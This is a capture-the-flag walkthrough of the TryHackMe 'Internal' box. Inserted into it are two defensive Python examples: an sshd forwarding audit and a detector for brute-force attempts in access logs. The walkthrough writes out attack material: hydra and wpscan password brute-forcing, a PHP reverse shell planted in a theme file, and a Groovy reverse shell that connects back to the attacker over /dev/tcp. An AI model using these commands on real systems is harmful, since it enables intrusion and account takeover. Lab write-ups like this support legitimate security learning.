TryHackMe : Internal Walkthrough

whokilleddb
6 min read · Aug 26, 2020


This week, TryHackMe launched the box Internal, and it's probably one of the best boxes I have faced so far. The sheer diversity of the box is enough to pump you up, and veterans of TryHackMe will love it.

First things first: add the IP of the machine to the /etc/hosts file on your own machine (the commands below use the hostname internal.thm).

The next step is Nmap enumeration. Scanning the host reveals nothing unusual, just the usual port 22 (SSH) and port 80 (HTTP). Move over to port 80 first, where you are greeted by an Apache2 Ubuntu Default Page.

Well, this calls for a gobuster scan. Use the common.txt wordlist for enumeration. (You can use other, more extensive wordlists, but you won't get any new results.)

gobuster dir -u internal.thm -w /usr/share/wordlists/dirb/common.txt

There are some very interesting entries in here. Have a look at phpmyadmin, blog and wordpress.

Since there's WordPress at play, it's always advisable to enumerate the site with wpscan. First, enumerate the site for potential users with the command:

wpscan --url internal.thm/wordpress/ -e u

The scan reveals the presence of the user admin. Use the same tool again, combined with the trusty old rockyou.txt, and try to brute-force your way in.

Once you have the password, log in to gain access to the control panel. However, you might be redirected to the login page again, even after entering the right credentials. To get a closer look, intercept the request with Burp Suite.

As you can see, we are being redirected back to the login page. Remove this section (highlighted in the image) and forward the request, and you should be logged in.

Now you will want to grab a PHP reverse shell. If you are using Kali or Parrot Security OS you should already have one; otherwise grab the one from Pentest Monkey. Head over to the Theme Editor and paste the reverse shell code in place of the contents of 404.php (remember to change the IP and port in the original script).

Fire up a netcat listener on the port assigned in the reverse shell and wait till you get a connection back.

nc -lnvp 6969

At this point, there are a lot of interesting things you can do. Start by downloading linpeas onto the machine and executing it.

Here, you can find the password to phpmyadmin. Also note the running services. At this point I thought that phpmyadmin could be leveraged to gain root access, but that's a dead end. The key, however, lies in the /opt directory.

Yay, you got the credentials for the user aubreanna! SSH your way in using the credentials you just got and snag that user flag! (You can run linpeas as aubreanna as well, but there's nothing new or interesting.)

With that out of the way, notice there's an interesting text file in our home directory by the name of jenkins.txt, which contains some interesting information.

Apparently, we have Jenkins running on port 8080 of an internal host (172.17.0.2) that only the box itself can reach. Use SSH local port forwarding to reach it from your own machine so that you can use your various tools on it:

ssh -L 6969:172.17.0.2:8080 aubreanna@internal.thm

Once connected, head over to port 6969 (or whatever you set it to) on your localhost, and there you should find the Jenkins service running.
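The tunnel works because sshd permits TCP forwarding for every user by default, so a leaked password for an unprivileged account like aubreanna's doubles as a pivot into addresses only the server can reach. As an added example, not from the original write-up, the Python below computes the effective sshd_config settings for a given user (global section plus Match User / Match Group blocks) and reports when forwarding is unrestricted or password logins are allowed. Both configurations are constructed for the example: the first is a typical distribution default, the second a hardened version that turns forwarding off globally and re-enables it only for an assumed group named ops, pinned to the Jenkins address used on this box. Only Match User and Match Group criteria are modelled, which is a simplification of sshd's matching rules.

```python
"""Compute effective sshd_config settings per user and flag pivot-friendly ones.

Added example with a simplified model of sshd_config: a global section plus
Match User / Match Group blocks (sshd supports more criteria than modelled here).
"""

# OpenSSH defaults for the keywords audited below (keyword names are case-insensitive).
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "permitopen": "any",
    "passwordauthentication": "yes",
}

# Values of AllowTcpForwarding that still permit "ssh -L" style local forwarding.
LOCAL_FORWARD_VALUES = {"yes", "all", "local"}


def _match_satisfied(criteria, user, groups):
    """Evaluate the criteria of a 'Match' line; only User and Group are modelled."""
    tokens = criteria.split()
    if len(tokens) % 2:
        return False
    for crit, patterns in zip(tokens[0::2], tokens[1::2]):
        allowed = set(patterns.split(","))
        crit = crit.lower()
        if crit == "user":
            ok = user in allowed
        elif crit == "group":
            ok = bool(allowed & set(groups))
        else:
            ok = False  # Address, Host, etc. are not modelled (simplification)
        if not ok:
            return False
    return True


def effective_config(text, user, groups=()):
    """Return the effective keyword -> value mapping for `user` (lower-case keys).

    sshd semantics modelled: the first global instance of a keyword wins; a
    satisfied Match block overrides the global value, and among satisfied Match
    blocks the first instance of a keyword wins.
    """
    global_vals, match_vals = {}, {}
    in_satisfied_match = None  # None while still in the global section
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and indentation
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            in_satisfied_match = _match_satisfied(value, user, groups)
        elif in_satisfied_match is None:
            global_vals.setdefault(key, value)
        elif in_satisfied_match:
            match_vals.setdefault(key, value)
    effective = dict(DEFAULTS)
    effective.update(global_vals)
    effective.update(match_vals)
    return effective


def audit(text, user, groups=()):
    """Return human-readable findings for `user` under the given sshd_config text."""
    eff = effective_config(text, user, groups)
    findings = []
    if (eff["allowtcpforwarding"].lower() in LOCAL_FORWARD_VALUES
            and eff["permitopen"].lower() == "any"):
        findings.append(f"{user}: can forward to any address "
                        f"(AllowTcpForwarding {eff['allowtcpforwarding']}, PermitOpen any)")
    if eff["passwordauthentication"].lower() == "yes":
        findings.append(f"{user}: password login allowed; a password read from a "
                        "file on disk is enough for a shell")
    return findings


# Constructed sample: a typical distribution default (forwarding left at its default "yes").
WEAK_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication yes
X11Forwarding yes
"""

# Constructed sample: forwarding off for everyone, re-enabled for one assumed group
# and pinned to the internal Jenkins address used on this box.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
AllowTcpForwarding no
Match Group ops
    AllowTcpForwarding local
    PermitOpen 172.17.0.2:8080
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        for user, groups in (("aubreanna", ("aubreanna",)), ("deploy", ("ops",))):
            print(name, user, audit(cfg, user, groups) or "no findings")
```

Under the hardened configuration aubreanna can still log in (with a key) but the -L forward above is refused, while a member of ops can forward only to 172.17.0.2:8080. Run the script against a real sshd_config together with `sshd -T -C user=aubreanna` to cross-check the simplified model against what sshd itself computes.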

We don't know any usernames or passwords, so we'll use a common username like admin and brute-force our way in with hydra and rockyou.txt as follows. (You could also use hydra to brute-force usernames, but that would take a really, really long time.)

hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 6969 127.0.0.1 http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password"

Once you get the password, log in to Jenkins using the credentials you just got. Once in, navigate to the Script Console, which lets you execute Groovy code, and therefore system commands, on the Jenkins host.
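Seen from the defending side, both password attacks used on this box (wpscan's user enumeration and password guessing against wp-login.php earlier, and the hydra run against /j_acegi_security_check here) are noisy in the web server's access log. The following Python script is an added example, not part of the original write-up, that parses combined-format access log lines and flags a client probing ?author=N user IDs or sending repeated login POSTs inside a short sliding window. The log lines, the client addresses (including 172.17.0.1 as an assumed docker-host address), the thresholds and the assumption that Jenkins requests are logged in the same format (for instance by a reverse proxy in front of it) are all constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" log format (nginx's default "combined" format has the same shape).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Form-login endpoints from this box: WordPress and Jenkins (Acegi security).
LOGIN_PATHS = {"/wordpress/wp-login.php", "/j_acegi_security_check"}
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")
WP_USERS_API = "/wordpress/wp-json/wp/v2/users"


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, threshold=10, window_seconds=60, enum_ids=3):
    """Return (alert_type, client_ip, detail) tuples, at most one per client and type.

    Lines are assumed to be in chronological order, as a log file is.
    login-bruteforce: at least `threshold` POSTs to one login endpoint from one
                      client inside any `window_seconds` span (sliding window).
    wp-user-enum:     one client probing at least `enum_ids` distinct ?author=N
                      values and/or the REST users endpoint.
    """
    window = timedelta(seconds=window_seconds)
    post_times = defaultdict(deque)   # (ip, path) -> timestamps of recent POSTs
    probed = defaultdict(set)         # ip -> author ids (or "rest") requested
    flagged, alerts = set(), []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts = rec["ip"], rec["ts"]
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path in LOGIN_PATHS:
            q = post_times[(ip, path)]
            q.append(ts)
            while ts - q[0] > window:        # drop POSTs older than the window
                q.popleft()
            if len(q) >= threshold and (ip, path) not in flagged:
                flagged.add((ip, path))
                alerts.append(("login-bruteforce", ip,
                               f"{len(q)} POSTs to {path} within {window_seconds}s"))
        elif rec["method"] == "GET":
            m = AUTHOR_RE.search(rec["path"])
            if m:
                probed[ip].add(m.group(1))
            if path.startswith(WP_USERS_API):
                probed[ip].add("rest")
            if len(probed[ip]) >= enum_ids and ("enum", ip) not in flagged:
                flagged.add(("enum", ip))
                alerts.append(("wp-user-enum", ip,
                               f"probed user ids {sorted(probed[ip])}"))
    return alerts


def _line(ip, ts, method, path, status):
    """Build one constructed combined-format line (sample data, not real traffic)."""
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# Constructed sample traffic: a normal visitor, a wpscan-style author probe, a
# password burst at wp-login.php, and a hydra-style burst at the Jenkins login.
SAMPLE_LOG = [_line("10.10.14.1", "26/Aug/2020:10:00:00 +0000", "GET", "/wordpress/", 200)]
SAMPLE_LOG += [_line("10.10.14.5", f"26/Aug/2020:10:01:0{i} +0000", "GET",
                     f"/wordpress/?author={i}", 301 if i == 1 else 404) for i in (1, 2, 3)]
SAMPLE_LOG += [_line("10.10.14.5", f"26/Aug/2020:10:02:{i:02d} +0000", "POST",
                     "/wordpress/wp-login.php", 200) for i in range(12)]
# Jenkins is reached through the SSH tunnel, so it logs the tunnel's server-side
# address (assumed docker-host address here), not the attacker's machine.
SAMPLE_LOG += [_line("172.17.0.1", f"26/Aug/2020:10:05:{i:02d} +0000", "POST",
                     "/j_acegi_security_check", 302) for i in range(15)]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

Note where the Jenkins burst appears to come from: because hydra runs through the SSH tunnel, Jenkins sees the server side of the tunnel rather than the attacker's address, so an alert on that service is best correlated with sshd's authentication log (the aubreanna login and the forwarded port) for the same minutes.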

Fetch the Java reverse shell from Pentest Monkey (it is Groovy, which is what the Script Console runs) and run it in the console, replacing IP and PORT with your listener's address and port:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Again, spawn a netcat listener to catch the incoming connection. You should get a shell back as the user jenkins.

Exploring the home directory of the user jenkins reveals a lot of intimidating files and folders, like the file secret.key and the directory secrets, but that's not what you are looking for :")

What you are looking for is in the /opt folder. Move over to that directory and cat out the text file to reveal some information that will make you very happy!

You got the root password !!! Use the newly found credentials to change user to root and get the final root flag !

With this, we complete another box. Honestly, the SSH tunneling part makes this box very unique, and I had great fun solving it! Special thanks to Joe Helle aka The Mayor for all the help and support while solving the box. Follow me on Instagram and LinkedIn; till then, peace :D
